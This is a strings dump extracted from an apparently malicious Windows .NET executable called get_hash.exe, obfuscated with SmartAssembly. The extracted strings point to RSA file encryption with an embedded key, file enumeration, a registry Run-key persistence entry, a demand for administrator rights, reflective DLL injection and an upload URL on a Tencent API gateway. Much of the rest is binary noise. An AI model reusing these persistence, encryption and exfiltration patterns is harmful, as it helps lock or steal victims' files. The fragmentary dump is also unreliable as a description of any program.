!This program cannot be run in DOS mode.
`.rsrc
@.reloc
+ +%+*
+ +%+*+
+R+V,0
+P+U+]8b
+_+`,.
+@+A,-
p+?+"~0
+4+9+:
+++0+5
T+%+N~
XJ+I+NKa
a+$+&~'
+(+)(*
D$$[[aYZQ
hws2_ThLw&
PPPP@P@Ph
WhunMa
v4.0.30319
#Strings
get_hash.exe
get_hash
<Module>
mscorlib
Object
System
RSA_PEM
com.github.xiangyuecn.rsacsharp
ValueType
MemberRefsProxy
SmartAssembly.HouseOfCards
Strings
GetString
SmartAssembly.Delegates
MulticastDelegate
Attribute
PoweredByAttribute
SmartAssembly.Attributes
RSACryptoServiceProvider
System.Security.Cryptography
System.Text.RegularExpressions
Func`2
MemoryStream
System.IO
Action`1
<>9__27_3
Action`2
<>9__27_4
Func`3
ResourceManager
System.Resources
CultureInfo
System.Globalization
ModuleHandle
Dictionary`2
System.Collections.Generic
get_PublicOnly
get_Success
AsymmetricAlgorithm
ToXmlString
Encoding
System.Text
get_UTF8
GetBytes
Convert
ToBase64String
get_KeySize
String
get_Length
Encrypt
Decrypt
Stream
ToArray
IDisposable
Dispose
WebResponse
System.Net
IsNullOrEmpty
FromBase64String
SignData
VerifyData
CspParameters
set_Flags
CspProviderFlags
ImportParameters
RSAParameters
System.Numerics
BigInteger
op_Multiply
op_Subtraction
op_BitwiseAnd
op_Modulus
GreatestCommonDivisor
get_One
get_Zero
op_Inequality
op_Equality
op_UnaryNegation
op_Implicit
op_RightShift
DateTime
get_Now
ModPow
Replace
Contains
WriteByte
Concat
get_Groups
GroupCollection
get_Item
Capture
get_Value
ToString
ProcessModule
System.Diagnostics
get_FileName
HttpWebResponse
get_StatusDescription
TextReader
ReadToEnd
NextMatch
StringBuilder
Append
RuntimeHelpers
System.Runtime.CompilerServices
InitializeArray
RuntimeFieldHandle
Create
HashAlgorithm
ComputeHash
FromXmlString
WebRequest
set_Method
set_ContentType
Console
WriteLine
RegistryKey
Microsoft.Win32
CreateSubKey
Process
GetCurrentProcess
get_MainModule
SetValue
Environment
GetFolderPath
SpecialFolder
Directory
GetFiles
SearchOption
set_ContentLength
SetLength
GetRequestStream
GetResponseStream
GetResponse
GetTypeFromHandle
RuntimeTypeHandle
get_Assembly
Assembly
System.Reflection
get_Chars
Substring
Monitor
System.Threading
Intern
ToInt32
GetExecutingAssembly
GetManifestResourceStream
convertToPublic
modulus
exponent
inverseQ
dOrNull
.cctor
VirtualAlloc
kernel32
CreateMemberRefsDelegates
typeID
CreateGetStringDelegate
ownerType
object
method
Invoke
BeginInvoke
IAsyncResult
AsyncCallback
callback
EndInvoke
result
RSAObject
KeySize
HasPrivate
Culture
String1
String2
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
DebuggableAttribute
DebuggingModes
AssemblyTitleAttribute
AssemblyDescriptionAttribute
AssemblyConfigurationAttribute
AssemblyCompanyAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
ComVisibleAttribute
System.Runtime.InteropServices
GuidAttribute
AssemblyFileVersionAttribute
TargetFrameworkAttribute
System.Runtime.Versioning
SuppressIldasmAttribute
CompilerGeneratedAttribute
GeneratedCodeAttribute
System.CodeDom.Compiler
DebuggerNonUserCodeAttribute
AttributeUsageAttribute
AttributeTargets
EditorBrowsableAttribute
System.ComponentModel
EditorBrowsableState
.resources
ExportParameters
Modulus
Exponent
InverseQ
op_Division
CompareTo
System.Core
Enumerable
System.Linq
Reverse
IEnumerable`1
ToByteArray
get_Ticks
Exception
Func`1
FileStream
FileMode
FileAccess
FileShare
Registry
CurrentUser
StreamReader
ResolveTypeHandle
MemberInfo
get_Name
ResolveMethodHandle
RuntimeMethodHandle
MethodBase
GetMethodFromHandle
MethodInfo
get_IsStatic
FieldInfo
get_FieldType
Delegate
CreateDelegate
GetParameters
ParameterInfo
get_ParameterType
get_ReturnType
DynamicMethod
System.Reflection.Emit
GetILGenerator
ILGenerator
OpCodes
Ldarg_0
OpCode
Ldarg_1
Ldarg_2
Ldarg_3
Ldarg_S
Tailcall
Callvirt
GetFields
BindingFlags
GetModules
Module
get_ModuleHandle
get_Module
GetMethods
Ldc_I4
get_MetadataToken
TryGetValue
S0Rpenc
WrapNonExceptionThrows
get_hash
Copyright
2021
$36f4360c-2813-484d-a959-7ad6e84a4941
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4(
#Powered by SmartAssembly 8.0.2.4779
3System.Resources.Tools.StronglyTypedResourceBuilder
15.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADPa
DX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
ReflectiveDLLInjection
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC
Windows
requestedExecutionLevel
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
requestedExecutionLevel
-->
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!--
Windows
Windows
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!--
Windows
Windows Presentation Foundation (WPF)
Windows
.NET Framework 4.6 )
app.config
"EnableWindowsFormsHighDpiAutoResizing"
"true"
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
<!--
Windows
(Windows XP
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
"^1"b1 b1"
1"e1"m1"p1"
PUBLIC KEY
PRIVATE KEY
BEGIN END
PUBLIC KEY
-----BEGIN
-----END
PRIVATE KEY
Modulus
Exponent
InverseQ
<RSAKeyValue>
<Modulus>
</Modulus>
<Exponent>
</Exponent>
<InverseQ>
</InverseQ>
</RSAKeyValue>
--+.+?--+|\s+
\s*<RSAKeyValue>([<>\/\+=\w\s]+)</RSAKeyValue>\s*
<(.+?)>\s*([^<]+?)\s*</
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
AppName
<RSAKeyValue><Modulus>v1VSmC20wSryFlj7cYr057j5wTdjsviY/uohnKhRs5+FZg2PqgyzZ6qftIuJ7c2m1NGEnr6wmqJcwr72KJysRzK67iQ5NRiQYQtLyruo5HcPcK73M8a1RiiOv6DtTUMVQACa8FrnJUQ0RO+ZspiX6fNUVyBVFsi5C9n8WQ3uy2WXTGHjwlTR4nj/uD9YfAnabNQ3plsz2Ujnq2FyKFAF2R5DMqGeCQvtSPm77VyrRPXBJIimajs+x0G7gduFGGVk/WxGyzOzkc1/3gawYiZa0tyyZ6GeGSORqfb8GEUdzWeXMu8CUJSGqNvtecX4Tv9B/QnzwQAVuZvO74myWVKNlQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>
https://service-n246lmn7-1253514053.bj.apigw.tencentcs.com/release/UploadFileToCOSByAPIGW-1631274568
text/plain
String1
String2
{0d15f526-31f1-4d47-b720-b99d3e93f39f}
String1
String2F
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
get_hash
FileVersion
1.0.0.0
InternalName
get_hash.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
get_hash.exe
ProductName
get_hash
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0